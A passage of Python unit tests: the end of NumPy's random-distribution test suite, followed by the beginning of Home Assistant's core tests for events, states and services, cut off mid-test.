assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is correct for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype('l'))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != 'little':
val = val.byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(res == md5)
|
test_core.py
|
"""
tests.test_core
~~~~~~~~~~~~~~~
Provides tests to verify that Home Assistant core works.
"""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import os
import signal
import unittest
from unittest.mock import patch
import time
import threading
from datetime import datetime, timedelta
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
import homeassistant.util.dt as dt_util
from homeassistant.const import (
__version__, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
EVENT_STATE_CHANGED, ATTR_FRIENDLY_NAME, TEMP_CELCIUS,
TEMP_FAHRENHEIT)
from tests.common import get_test_home_assistant
PST = pytz.timezone('America/Los_Angeles')
class TestHomeAssistant(unittest.TestCase):
"""
Tests the Home Assistant core classes.
"""
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.hass = get_test_home_assistant()
self.hass.states.set("light.Bowl", "on")
self.hass.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
try:
self.hass.stop()
except HomeAssistantError:
# Already stopped after the block till stopped test
pass
def test_start(self):
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
lambda event: calls.append(1))
self.hass.start()
self.hass.pool.block_till_done()
self.assertEqual(1, len(calls))
# @patch('homeassistant.core.time.sleep')
def test_block_till_stoped(self):
""" Test if we can block till stop service is called. """
with patch('time.sleep'):
blocking_thread = threading.Thread(
target=self.hass.block_till_stopped)
self.assertFalse(blocking_thread.is_alive())
blocking_thread.start()
self.assertTrue(blocking_thread.is_alive())
self.hass.services.call(ha.DOMAIN, ha.SERVICE_HOMEASSISTANT_STOP)
self.hass.pool.block_till_done()
# Wait for thread to stop
for _ in range(20):
if not blocking_thread.is_alive():
break
time.sleep(0.05)
self.assertFalse(blocking_thread.is_alive())
def test_stopping_with_sigterm(self):
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
lambda event: calls.append(1))
def send_sigterm(length):
os.kill(os.getpid(), signal.SIGTERM)
with patch('homeassistant.core.time.sleep', send_sigterm):
self.hass.block_till_stopped()
self.assertEqual(1, len(calls))
class TestEvent(unittest.TestCase):
""" Test Event class. """
def test_eq(self):
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
""" Test that repr method works. #MoreCoverage """
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': dt_util.datetime_to_str(now),
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.bus = ha.EventBus(ha.create_worker_pool(0))
self.bus.listen('test_event', lambda x: len)
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.bus._pool.stop()
def test_add_remove_listener(self):
""" Test remove_listener method. """
self.bus._pool.add_worker()
old_count = len(self.bus.listeners)
def listener(_): pass
self.bus.listen('test', listener)
self.assertEqual(old_count + 1, len(self.bus.listeners))
# Try deleting a non registered listener, nothing should happen
self.bus.remove_listener('test', lambda x: len)
# Remove listener
self.bus.remove_listener('test', listener)
self.assertEqual(old_count, len(self.bus.listeners))
# Try deleting listener while category doesn't exist either
self.bus.remove_listener('test', listener)
def test_listen_once_event(self):
""" Test listen_once_event method. """
runs = []
self.bus.listen_once('test_event', lambda x: runs.append(1))
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.bus._pool.add_worker()
self.bus._pool.block_till_done()
self.assertEqual(1, len(runs))
class TestState(unittest.TestCase):
""" Test EventBus methods. """
def test_init(self):
""" Test state.init """
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_dict_conversion(self):
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
""" Test state.repr """
self.assertEqual("<state happy.happy=on @ 12:00:00 08-12-1984>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ 12:00:00 08-12-1984>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.states = ha.StateMachine(self.bus)
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.pool.stop()
def test_is_state(self):
""" Test is_state method. """
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_is_state_attr(self):
""" Test is_state_attr method. """
self.states.set("light.Bowl", "on", {"brightness": 100})
self.assertTrue(
self.states.is_state_attr('light.Bowl', 'brightness', 100))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 200))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 'Bowl'))
self.assertFalse(
self.states.is_state_attr('light.Non_existing', 'brightness', 100))
def test_entity_ids(self):
""" Test get_entity_ids method. """
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
""" Test remove method. """
self.pool.add_worker()
events = []
self.bus.listen(EVENT_STATE_CHANGED,
lambda event: events.append(event))
self.assertIn('light.bowl', self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.pool.block_till_done()
self.assertNotIn('light.bowl', self.states.entity_ids())
self.assertEqual(1, len(events))
self.assertEqual('light.bowl', events[0].data.get('entity_id'))
self.assertIsNotNone(events[0].data.get('old_state'))
self.assertEqual('light.bowl', events[0].data['old_state'].entity_id)
self.assertIsNone(events[0].data.get('new_state'))
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
self.pool.block_till_done()
self.assertEqual(1, len(events))
def test_case_insensitivty(self):
self.pool.add_worker()
runs = []
self.bus.listen(EVENT_STATE_CHANGED, lambda event: runs.append(event))
self.states.set('light.BOWL', 'off')
self.bus._pool.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
state = self.states.get('light.Bowl')
future = dt_util.utcnow() + timedelta(hours=10)
with patch('homeassistant.util.dt.utcnow', return_value=future):
self.states.set("light.Bowl", "on", {'attr': 'triggers_change'})
self.assertEqual(state.last_changed,
self.states.get('light.Bowl').last_changed)
class TestServiceCall(unittest.TestCase):
""" Test ServiceCall class. """
def test_repr(self):
""" Test repr method. """
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.services = ha.ServiceRegistry(self.bus, self.pool)
self.services.register("test_domain", "test_service", lambda x: None)
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
if self.pool.worker_count:
self.pool.stop()
def test_has_service(self):
""" Test has_service method. """
self.assertTrue(
self.services.has_service("test_domain", "test_service"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
expected = {
'test_domain': {'test_service': {'description': '', 'fields': {}}}
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
self.pool.add_worker()
self.pool.add_worker()
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
self.assertTrue(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(1, len(calls))
def test_call_with_blocking_not_done_in_time(self):
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(0, len(calls))
ha.SERVICE_CALL_LIMIT = orig_limit
def test_call_non_existing_with_blocking(self):
self.pool.add_worker()
self.pool.add_worker()
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
